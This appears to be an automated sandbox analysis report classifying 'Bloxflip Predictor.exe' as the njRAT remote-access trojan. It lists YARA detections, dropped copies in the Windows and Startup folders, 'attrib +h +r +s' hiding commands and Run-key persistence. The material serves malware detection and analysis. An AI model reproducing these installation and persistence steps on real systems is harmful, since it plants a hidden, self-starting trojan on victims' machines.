          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000A.00000002.2394132880.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 428, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 7056, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Windows.exe PID: 6364, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Windows\Bloxflip Predictor.exe
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeCode function: 1_2_01020370
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeCode function: 1_2_01020360
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_012D0370
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_012D0360
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 10_2_05760370
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 10_2_05760360
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeCode function: 12_2_01A00370
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeCode function: 12_2_01A00360
          Source: Bloxflip Predictor.exe, 00000001.00000002.2144638603.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Bloxflip Predictor.exe
          Source: Bloxflip Predictor.exe, 00000002.00000002.4504825162.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Bloxflip Predictor.exe
          Source: Bloxflip Predictor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 0000000A.00000002.2394132880.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 7056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Windows.exe PID: 6364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: classification engineClassification label: mal100.phis.troj.adwa.evad.winEXE@14/6@2/2
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_05EE2B2E AdjustTokenPrivileges
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_05EE2AF7 AdjustTokenPrivileges
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
          Source: C:\Windows\Bloxflip Predictor.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
          Source: C:\Windows\Bloxflip Predictor.exeMutant created: \Sessions\1\BaseNamedObjects\Windows
          Source: Bloxflip Predictor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Bloxflip Predictor.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Bloxflip Predictor.exeReversingLabs: Detection: 84%
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile read: C:\Users\user\Desktop\Bloxflip Predictor.exe
          Source: unknownProcess created: C:\Users\user\Desktop\Bloxflip Predictor.exe "C:\Users\user\Desktop\Bloxflip Predictor.exe"
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe"
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
          Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
          Source: unknown; Process created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe"
          Source: unknown; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, windows.storage.dll, wldp.dll, profapi.dll, uxtheme.dll, shfolder.dll, sxs.dll, mpr.dll, scrrun.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
          Source: C:\Windows\Bloxflip Predictor.exe; Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, windows.storage.dll, wldp.dll, profapi.dll, uxtheme.dll, shfolder.dll, sxs.dll, mpr.dll, scrrun.dll, propsys.dll, ntmarta.dll, sspicli.dll, wbemcomn.dll, amsi.dll, userenv.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, security.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, avicap32.dll, msvfw32.dll, winmm.dll
          Source: C:\Windows\SysWOW64\attrib.exe; Section loaded: ulib.dll, fsutilext.dll
          Source: C:\Windows\Bloxflip Predictor.exe; Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, windows.storage.dll, wldp.dll, profapi.dll, uxtheme.dll, shfolder.dll, sxs.dll, mpr.dll, scrrun.dll, propsys.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe; Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, windows.storage.dll, wldp.dll, profapi.dll, uxtheme.dll, shfolder.dll, sxs.dll, mpr.dll, scrrun.dll, propsys.dll
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
          Source: C:\Windows\Bloxflip Predictor.exe; File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: Bloxflip Predictor.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Bloxflip Predictor.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          Source: Bloxflip Predictor.exe, L.cs; .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: Bloxflip Predictor.exe.1.dr, L.cs; .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, L.cs; .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: Windows.exe.2.dr, L.cs; .Net Code: Plugin System.Reflection.Assembly.Load(byte[])

          Persistence and Installation Behavior

          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Executable created and started: C:\Windows\Bloxflip Predictor.exe
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Process created: attrib.exe
          Source: C:\Windows\Bloxflip Predictor.exe; Process created: attrib.exe
          Source: C:\Windows\Bloxflip Predictor.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File created: C:\Windows\Bloxflip Predictor.exe

          Boot Survival

          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2
          Source: C:\Windows\Bloxflip Predictor.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
          Source: C:\Windows\Bloxflip Predictor.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2
          Source: C:\Windows\Bloxflip Predictor.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
          Source: C:\Windows\Bloxflip Predictor.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows2
          Source: C:\Windows\Bloxflip Predictor.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Bloxflip Predictor.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Memory allocated: FA0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Memory allocated: 2B70000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Memory allocated: 4B70000 memory commit | memory reserve | memory write watch
          Source: C:\Windows\Bloxflip Predictor.exe; Memory allocated: 1250000 memory reserve | memory write watch
          Source: C:\Windows\Bloxflip Predictor.exe; Memory allocated: 32B0000 memory reserve | memory write watch
          Source: C:\Windows\Bloxflip Predictor.exe; Memory allocated: 52B0000 memory commit | memory reserve | memory write watch
          Source: C:\Windows\Bloxflip Predictor.exe; Memory allocated: 3400000 memory reserve | memory write watch
          Source: C:\Windows\Bloxflip Predictor.exe; Memory allocated: 5400000 memory commit | memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe; Memory allocated: 1830000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe; Memory allocated: 34A0000 memory reserve | memory write watch
